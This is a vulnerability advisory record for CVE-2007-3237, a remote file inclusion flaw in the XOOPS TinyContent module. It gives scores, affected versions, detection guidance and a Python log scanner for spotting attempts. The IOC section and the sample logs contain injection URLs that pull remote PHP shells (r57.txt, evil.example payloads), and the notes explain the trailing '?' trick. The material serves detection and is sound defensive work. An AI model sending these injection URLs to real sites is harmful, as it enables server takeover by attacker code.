CVE-2007-3237
published 2007-06-15


Priority: P3 (50)
CVSS 2.0: 6.8 (medium), vector AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit referenced in sources
EPSS: 67.66% (99.2th percentile)
PHP remote file inclusion vulnerability in admin/spaw/spaw_control.class.php in the TinyContent 1.5 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656.

Affected (1 range)

Vendor: xoops
Product: tinycontent_module
Version range: not specified
Fixed in: not specified

Detection & IOCs (extracted from sources)

URL: http://www.site.com/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=evilcode.txt?
URL: http://www.wiscpsa.org/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ekin0x.com/r57.txt?
Path: admin/spaw/spaw_control.class.php
  • Detect HTTP requests to the vulnerable script path whose spaw_root parameter carries a URL; such a request is a remote file inclusion attempt.
  • The spaw_root parameter is the injection point: monitor GET requests to spaw_control.class.php where spaw_root contains an external URL (http:// or https://), including URL-encoded forms of the scheme.
  • The vulnerable module path is modules/tinycontent/admin/spaw/spaw_control.class.php; alert on any access to this path from outside the administrative network.
  • This CVE is noted as probably a duplicate of CVE-2006-4656, so detections will overlap with that earlier vulnerability in the same SPAW component.
  • The public exploit appends a trailing '?' to the injected URL so that the remainder of the include path is treated as a query string; detection rules should not require the value to end at the URL and should tolerate this trailing '?'.
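The detection logic above, as an added example that is not part of the original record: a small log scanner that flags requests to the vulnerable script where spaw_root carries a remote URL (plain or percent-encoded) and records whether the trailing '?' trick was used. The access-log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Vulnerable script path from the advisory (CVE-2007-3237).
VULN_PATH = "admin/spaw/spaw_control.class.php"
# spaw_root is the injection point; a remote scheme in its value is the RFI signature.
REMOTE_SCHEME = re.compile(r"^\s*(https?|ftp)://", re.IGNORECASE)
# Common Log Format: ip ident user [ts] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def check_request(target):
    """Return a finding dict for an RFI-shaped request target, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(VULN_PATH):
        return None
    # keep_blank_values so a bare "spaw_root=" is still visible when reviewing
    params = parse_qs(parts.query, keep_blank_values=True)
    for raw in params.get("spaw_root", []):
        value = unquote(raw)  # parse_qs decoded once; this catches double-encoding
        if REMOTE_SCHEME.match(value):
            return {
                "spaw_root": value,
                # the public PoC appends '?' so the rest of the include path becomes a query string
                "trailing_query_trick": value.rstrip().endswith("?"),
            }
    return None

def scan_log(lines):
    """Run check_request over access-log lines, returning findings with source context."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = check_request(m.group("target"))
        if hit:
            hit.update(ip=m.group("ip"), ts=m.group("ts"), status=m.group("status"))
            findings.append(hit)
    return findings

# Constructed sample log lines: two RFI attempts, one local-path value, one unrelated request.
LOG_SAMPLE = [
    '203.0.113.5 - - [15/Jun/2007:10:02:11 +0000] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://evil.example/payload.txt? HTTP/1.1" 200 512',
    '198.51.100.7 - - [15/Jun/2007:10:03:40 +0000] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=%2Fvar%2Fwww%2Fhtml%2F HTTP/1.1" 200 210',
    '192.0.2.9 - - [15/Jun/2007:10:04:02 +0000] "GET /modules/tinycontent/index.php?id=3 HTTP/1.1" 200 1024',
    '203.0.113.5 - - [15/Jun/2007:10:05:55 +0000] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=HTTPS%3A%2F%2Fevil.example%2Fshell.txt HTTP/1.1" 404 162',
]

if __name__ == "__main__":
    for f in scan_log(LOG_SAMPLE):
        print(f)
```

The local-path value in the second line is not flagged because the record only covers remote inclusion; a separate rule would be needed if local file inclusion through the same parameter is a concern.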